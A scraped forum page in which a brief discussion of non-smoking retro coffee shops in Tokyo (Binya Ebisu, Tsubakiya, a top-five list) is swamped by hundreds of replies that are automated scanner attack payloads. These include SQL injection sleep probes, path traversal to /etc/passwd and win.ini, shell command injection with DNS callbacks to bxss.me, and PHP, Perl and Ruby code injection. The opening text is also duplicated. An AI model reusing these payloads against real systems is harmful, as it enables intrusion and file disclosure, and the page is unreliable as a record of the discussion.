It's very close to JR Ebisu station exit, upscale/retro/elegant. Though they open a bit later, but also offer savory courses. Don't miss their hotcakes made with Hokkaido flour and other delectable desserts (kanten) and also yogashi / castella cake too. This is a very local experience. I think they opened originally in Shizuoka, and Ebisu is their only other branch outside.
For a chain, I enjoy Tsubakiya https://tabelog.com/en/tokyo/A1301/A130102/13007559/ (this location in Yurakucho), although the non smoking room gets fumes from the smoking section. It also has nice retro vibes and their cakes are quite excellent (coffee tube cake). The premium iced coffee includes coffee ice cubes.
Cafe de L'ambre also has some retro charm (but is not non smoking). There are also lots of western / European third wave coffee shops, so I suppose it also depends what you are looking for.
5 Comments
For something that is more in line with Japanese style Kohi-ten or Kissaten, and a rare non smoking one at that, I really enjoy Binya Ebisu
https://tabelog.com/en/tokyo/A1303/A130302/13014332/
It's very close to JR Ebisu station exit, upscale/retro/elegant. Though they open a bit later, but also offer savory courses. Don't miss their hotcakes made with Hokkaido flour and other delectable desserts (kanten) and also yogashi / castella cake too. This is a very local experience. I think they opened originally in Shizuoka, and Ebisu is their only other branch outside.
For a chain, I enjoy Tsubakiya https://tabelog.com/en/tokyo/A1301/A130102/13007559/ (this location in Yurakucho), although the non smoking room gets fumes from the smoking section. It also has nice retro vibes and their cakes are quite excellent (coffee tube cake). The premium iced coffee includes coffee ice cubes.
Cafe de L'ambre also has some retro charm (but is not non smoking). There are also lots of western / European third wave coffee shops, so I suppose it also depends what you are looking for.
re: ChuToroZuke
JyDff9uI
re: ChuToroZuke
1*
re: ChuToroZuke
1*
re: ChuToroZuke
1*
re: ChuToroZuke
1*
re: ChuToroZuke
-1 OR 2+783-783-1=0+0+0+1
re: ChuToroZuke
-1 OR 3+783-783-1=0+0+0+1
re: ChuToroZuke
if(now()=sysdate(),sleep(15),0)
re: ChuToroZuke
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: ChuToroZuke
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: ChuToroZuke
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: ChuToroZuke
-1; waitfor delay '0:0:15' --
re: ChuToroZuke
-1); waitfor delay '0:0:15' --
re: ChuToroZuke
1 waitfor delay '0:0:15' --
re: ChuToroZuke
ViN5Vd8K'; waitfor delay '0:0:15' --
re: ChuToroZuke
-5 OR 631=(SELECT 631 FROM PG_SLEEP(15))--
re: ChuToroZuke
-5) OR 741=(SELECT 741 FROM PG_SLEEP(15))--
re: ChuToroZuke
-1)) OR 677=(SELECT 677 FROM PG_SLEEP(15))--
re: ChuToroZuke
W5MBttQe' OR 430=(SELECT 430 FROM PG_SLEEP(15))--
re: ChuToroZuke
sAQtk9Wj') OR 842=(SELECT 842 FROM PG_SLEEP(15))--
re: ChuToroZuke
2eIuzeao')) OR 696=(SELECT 696 FROM PG_SLEEP(15))--
re: ChuToroZuke
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: ChuToroZuke
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: ChuToroZuke
'||(select 1 from (select pg_sleep(15))x)||'
re: ChuToroZuke
''||(select 1 from (select pg_sleep(15))x)||''
re: ChuToroZuke
1'"
re: ChuToroZuke
@@9WtwE
re: ChuToroZuke
70LQYHds
re: ChuToroZuke
1*
re: ChuToroZuke
1*
re: ChuToroZuke
1*
re: ChuToroZuke
1*
re: ChuToroZuke
-1 OR 2+310-310-1=0+0+0+1
re: ChuToroZuke
-1 OR 3+310-310-1=0+0+0+1
re: ChuToroZuke
if(now()=sysdate(),sleep(15),0)
re: ChuToroZuke
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: ChuToroZuke
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: ChuToroZuke
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: ChuToroZuke
-1; waitfor delay '0:0:15' --
re: ChuToroZuke
-1); waitfor delay '0:0:15' --
re: ChuToroZuke
1 waitfor delay '0:0:15' --
re: ChuToroZuke
X2bUM9sZ'; waitfor delay '0:0:15' --
re: ChuToroZuke
-5 OR 175=(SELECT 175 FROM PG_SLEEP(15))--
re: ChuToroZuke
-5) OR 872=(SELECT 872 FROM PG_SLEEP(15))--
re: ChuToroZuke
-1)) OR 281=(SELECT 281 FROM PG_SLEEP(15))--
re: ChuToroZuke
NGcynW4W' OR 391=(SELECT 391 FROM PG_SLEEP(15))--
re: ChuToroZuke
E7Gzm682') OR 759=(SELECT 759 FROM PG_SLEEP(15))--
re: ChuToroZuke
fB1rogLl')) OR 116=(SELECT 116 FROM PG_SLEEP(15))--
re: ChuToroZuke
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: ChuToroZuke
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: ChuToroZuke
'||(select 1 from (select pg_sleep(15))x)||'
re: ChuToroZuke
''||(select 1 from (select pg_sleep(15))x)||''
re: ChuToroZuke
1'"
re: ChuToroZuke
@@TExWv
re: ChuToroZuke
1kqz8ZoxO
re: ChuToroZuke
response.write(9095629*9712792)
re: ChuToroZuke
'+response.write(9095629*9712792)+'
re: ChuToroZuke
"+response.write(9095629*9712792)+"
re: ChuToroZuke
../../../../../../../../../../../../../../etc/passwd
re: ChuToroZuke
../../../../../../../../../../../../../../windows/win.ini
re: ChuToroZuke
file:///etc/passwd
re: ChuToroZuke
echo kvffgy$()\ tgevbf\nz^xyu||a #' &echo kvffgy$()\ tgevbf\nz^xyu||a #|" &echo kvffgy$()\ tgevbf\nz^xyu||a #
re: ChuToroZuke
../../../../../../../../../../../../../../../proc/version
re: ChuToroZuke
&echo nfmmdf$()\ kadics\nz^xyu||a #' &echo nfmmdf$()\ kadics\nz^xyu||a #|" &echo nfmmdf$()\ kadics\nz^xyu||a #
re: ChuToroZuke
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: ChuToroZuke
|echo fdnqwr$()\ wrisfi\nz^xyu||a #' |echo fdnqwr$()\ wrisfi\nz^xyu||a #|" |echo fdnqwr$()\ wrisfi\nz^xyu||a #
re: ChuToroZuke
../../../../../../../../../../etc/passwd%00.jpg
re: ChuToroZuke
(nslookup hitaefodtdirna138b.bxss.me||perl -e "gethostbyname('hitaefodtdirna138b.bxss.me')")
re: ChuToroZuke
$(nslookup hitquyvrplemueb1d3.bxss.me||perl -e "gethostbyname('hitquyvrplemueb1d3.bxss.me')")
re: ChuToroZuke
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: ChuToroZuke
&nslookup hitadlkmkbozuac8f1.bxss.me&'\"`0&nslookup hitadlkmkbozuac8f1.bxss.me&`'
re: ChuToroZuke
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: ChuToroZuke
&(nslookup hitufyvjkwfwcd4709.bxss.me||perl -e "gethostbyname('hitufyvjkwfwcd4709.bxss.me')")&'\"`0&(nslookup hitufyvjkwfwcd4709.bxss.me||perl -e "gethostbyname('hitufyvjkwfwcd4709.bxss.me')")&`'
re: ChuToroZuke
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: ChuToroZuke
|(nslookup hitwsgpucnqcrb41e6.bxss.me||perl -e "gethostbyname('hitwsgpucnqcrb41e6.bxss.me')")
re: ChuToroZuke
/etc/passwd
re: ChuToroZuke
`(nslookup hitbmgplgbstgeaae4.bxss.me||perl -e "gethostbyname('hitbmgplgbstgeaae4.bxss.me')")`
re: ChuToroZuke
;(nslookup hitnjtdoctitj0d993.bxss.me||perl -e "gethostbyname('hitnjtdoctitj0d993.bxss.me')")|(nslookup hitnjtdoctitj0d993.bxss.me||perl -e "gethostbyname('hitnjtdoctitj0d993.bxss.me')")&(nslookup hitnjtdoctitj0d993.bxss.me||perl -e "gethostbyname('hitnjtdoctitj0d993.bxss.me')")
re: ChuToroZuke
%2fetc%2fpasswd
re: ChuToroZuke
/.././.././.././.././.././.././.././../etc/./passwd%00
re: ChuToroZuke
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: ChuToroZuke
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: ChuToroZuke
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: ChuToroZuke
%0abcc:074625.67-13673.67.26c4e.19990.2@bxss.me
re: ChuToroZuke
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: ChuToroZuke
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: ChuToroZuke
to@example.com>%0d%0abcc:074625.67-13674.67.26c4e.19990.2@bxss.me
re: ChuToroZuke
file:///etc/passwd
re: ChuToroZuke
/\../\../\../\../\../\../\../etc/passwd
re: ChuToroZuke
/WEB-INF/web.xml
re: ChuToroZuke
C:\WINDOWS\system32\drivers\etc\hosts
re: ChuToroZuke
../../../../../../../../../../windows/win.ini%00.jpg
re: ChuToroZuke
/../../../../../../../../../../boot.ini
re: ChuToroZuke
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: ChuToroZuke
..\..\..\..\..\..\..\..\windows\win.ini
re: ChuToroZuke
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: ChuToroZuke
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: ChuToroZuke
<esi:include src="http://bxss.me/rpb.png"/>
re: ChuToroZuke
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: ChuToroZuke
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: ChuToroZuke
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: ChuToroZuke
${10000233+10000292}
re: ChuToroZuke
WEB-INF/web.xml
re: ChuToroZuke
WEB-INF\web.xml
re: ChuToroZuke
)
re: ChuToroZuke
!(()&&!|*|*|
re: ChuToroZuke
^(#$!@#$)(()))******
re: ChuToroZuke
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: ChuToroZuke
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: ChuToroZuke
Http://bxss.me/t/fit.txt
re: ChuToroZuke
http://bxss.me/t/fit.txt%3F.jpg
re: ChuToroZuke
/etc/shells
re: ChuToroZuke
c:/windows/win.ini
re: ChuToroZuke
bxss.me
re: ChuToroZuke
'.gethostbyname(lc('hitvn'.'ajdalodv181a6.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(89).chr(98).chr(86).'
re: ChuToroZuke
".gethostbyname(lc("hithi"."jhduoojv91b96.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(90).chr(118).chr(80)."
re: ChuToroZuke
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: ChuToroZuke
HttP://bxss.me/t/xss.html?%00
re: ChuToroZuke
';print(md5(31337));$a='
re: ChuToroZuke
bxss.me/t/xss.html?%00
re: ChuToroZuke
";print(md5(31337));$a="
re: ChuToroZuke
${@print(md5(31337))}
re: ChuToroZuke
${@print(md5(31337))}\
re: ChuToroZuke
'.print(md5(31337)).'
re: ChuToroZuke
"+"A".concat(70-3).concat(22*4).concat(116).concat(87).concat(120).concat(67)+(require"socket"
Socket.gethostbyname("hitke"+"rrjoqpxle60a0.bxss.me.")[3].to_s)+"
re: ChuToroZuke
'+'A'.concat(70-3).concat(22*4).concat(118).concat(65).concat(122).concat(82)+(require'socket'
Socket.gethostbyname('hiteg'+'ykmtgdie158af.bxss.me.')[3].to_s)+'
re: ChuToroZuke
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: ChuToroZuke
'"
re: ChuToroZuke
<!--
re: ChuToroZuke
1
re: ChuToroZuke
1
re: ChuToroZuke
-1 OR 2+529-529-1=0+0+0+1 --
re: ChuToroZuke
-1 OR 3+529-529-1=0+0+0+1 --
re: ChuToroZuke
-1 OR 2+629-629-1=0+0+0+1
re: ChuToroZuke
-1 OR 3+629-629-1=0+0+0+1
re: ChuToroZuke
-1' OR 2+948-948-1=0+0+0+1 --
re: ChuToroZuke
-1' OR 3+948-948-1=0+0+0+1 --
re: ChuToroZuke
-1' OR 2+170-170-1=0+0+0+1 or 'EJPi2w5m'='
re: ChuToroZuke
-1' OR 3+170-170-1=0+0+0+1 or 'EJPi2w5m'='
re: ChuToroZuke
-1" OR 2+766-766-1=0+0+0+1 --
re: ChuToroZuke
-1" OR 3+766-766-1=0+0+0+1 --
re: ChuToroZuke
if(now()=sysdate(),sleep(15),0)
re: ChuToroZuke
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: ChuToroZuke
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: ChuToroZuke
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: ChuToroZuke
-1; waitfor delay '0:0:15' --
re: ChuToroZuke
-1); waitfor delay '0:0:15' --
re: ChuToroZuke
1 waitfor delay '0:0:15' --
re: ChuToroZuke
GO2PX8ng'; waitfor delay '0:0:15' --
re: ChuToroZuke
-5 OR 39=(SELECT 39 FROM PG_SLEEP(15))--
re: ChuToroZuke
-5) OR 434=(SELECT 434 FROM PG_SLEEP(15))--
re: ChuToroZuke
-1)) OR 547=(SELECT 547 FROM PG_SLEEP(15))--
re: ChuToroZuke
aYXFULS5' OR 407=(SELECT 407 FROM PG_SLEEP(15))--
re: ChuToroZuke
pdaU98hF') OR 136=(SELECT 136 FROM PG_SLEEP(15))--
re: ChuToroZuke
v0wUDDVu')) OR 305=(SELECT 305 FROM PG_SLEEP(15))--
re: ChuToroZuke
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: ChuToroZuke
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: ChuToroZuke
'||(select 1 from (select pg_sleep(15))x)||'
re: ChuToroZuke
''||(select 1 from (select pg_sleep(15))x)||''
re: ChuToroZuke
1'"
re: ChuToroZuke
@@nBoId
1. Koffee Mameya
2. Glitch Coffee
3. Acid Coffee
4. Fuglen Coffee Roasters
5. Leaves Coffee Roasters
re: Brady
9ITIkeP1
re: Brady
1*
re: Brady
1*
re: Brady
1*
re: Brady
1*
re: Brady
-1 OR 2+289-289-1=0+0+0+1
re: Brady
-1 OR 3+289-289-1=0+0+0+1
re: Brady
if(now()=sysdate(),sleep(15),0)
re: Brady
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Brady
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Brady
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Brady
-1; waitfor delay '0:0:15' --
re: Brady
-1); waitfor delay '0:0:15' --
re: Brady
1 waitfor delay '0:0:15' --
re: Brady
SH19mUzT'; waitfor delay '0:0:15' --
re: Brady
-5 OR 345=(SELECT 345 FROM PG_SLEEP(15))--
re: Brady
-5) OR 167=(SELECT 167 FROM PG_SLEEP(15))--
re: Brady
-1)) OR 936=(SELECT 936 FROM PG_SLEEP(15))--
re: Brady
Y6HbWCJP' OR 272=(SELECT 272 FROM PG_SLEEP(15))--
re: Brady
0r7K2o8o') OR 243=(SELECT 243 FROM PG_SLEEP(15))--
re: Brady
0gvOtyXO')) OR 280=(SELECT 280 FROM PG_SLEEP(15))--
re: Brady
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Brady
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Brady
'||(select 1 from (select pg_sleep(15))x)||'
re: Brady
''||(select 1 from (select pg_sleep(15))x)||''
re: Brady
1'"
re: Brady
@@c0SNM
re: Brady
ecdEMHxI
re: Brady
1*
re: Brady
1*
re: Brady
1*
re: Brady
1*
re: Brady
-1 OR 2+673-673-1=0+0+0+1
re: Brady
-1 OR 3+673-673-1=0+0+0+1
re: Brady
if(now()=sysdate(),sleep(15),0)
re: Brady
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Brady
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Brady
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Brady
-1; waitfor delay '0:0:15' --
re: Brady
-1); waitfor delay '0:0:15' --
re: Brady
1 waitfor delay '0:0:15' --
re: Brady
hoN9VpG1'; waitfor delay '0:0:15' --
re: Brady
-5 OR 643=(SELECT 643 FROM PG_SLEEP(15))--
re: Brady
-5) OR 290=(SELECT 290 FROM PG_SLEEP(15))--
re: Brady
-1)) OR 494=(SELECT 494 FROM PG_SLEEP(15))--
re: Brady
MJ8jFpkk' OR 204=(SELECT 204 FROM PG_SLEEP(15))--
re: Brady
4G8U2lMy') OR 493=(SELECT 493 FROM PG_SLEEP(15))--
re: Brady
gbKxT8GN')) OR 871=(SELECT 871 FROM PG_SLEEP(15))--
re: Brady
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Brady
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Brady
'||(select 1 from (select pg_sleep(15))x)||'
re: Brady
''||(select 1 from (select pg_sleep(15))x)||''
re: Brady
1'"
re: Brady
@@DuhhH
re: Brady
1Ndh6RncO
re: Brady
%0abcc:074625.67-13502.67.be7c5.19990.2@bxss.me
re: Brady
response.write(9890923*9960614)
re: Brady
to@example.com>%0d%0abcc:074625.67-13503.67.be7c5.19990.2@bxss.me
re: Brady
'+response.write(9890923*9960614)+'
re: Brady
"+response.write(9890923*9960614)+"
re: Brady
<esi:include src="http://bxss.me/rpb.png"/>
re: Brady
../../../../../../../../../../../../../../etc/passwd
re: Brady
${9999741+9999443}
re: Brady
../../../../../../../../../../../../../../windows/win.ini
re: Brady
file:///etc/passwd
re: Brady
../../../../../../../../../../../../../../../proc/version
re: Brady
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Brady
../../../../../../../../../../etc/passwd%00.jpg
re: Brady
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Brady
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Brady
)
re: Brady
'.gethostbyname(lc('hitfy'.'ozilvdsv67fa0.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(85).chr(116).chr(86).'
re: Brady
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Brady
".gethostbyname(lc("hitiw"."cyhlnlan4c2e5.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(75).chr(108).chr(86)."
re: Brady
!(()&&!|*|*|
re: Brady
/etc/passwd
re: Brady
echo baypgd$()\ kdgqda\nz^xyu||a #' &echo baypgd$()\ kdgqda\nz^xyu||a #|" &echo baypgd$()\ kdgqda\nz^xyu||a #
re: Brady
^(#$!@#$)(()))******
re: Brady
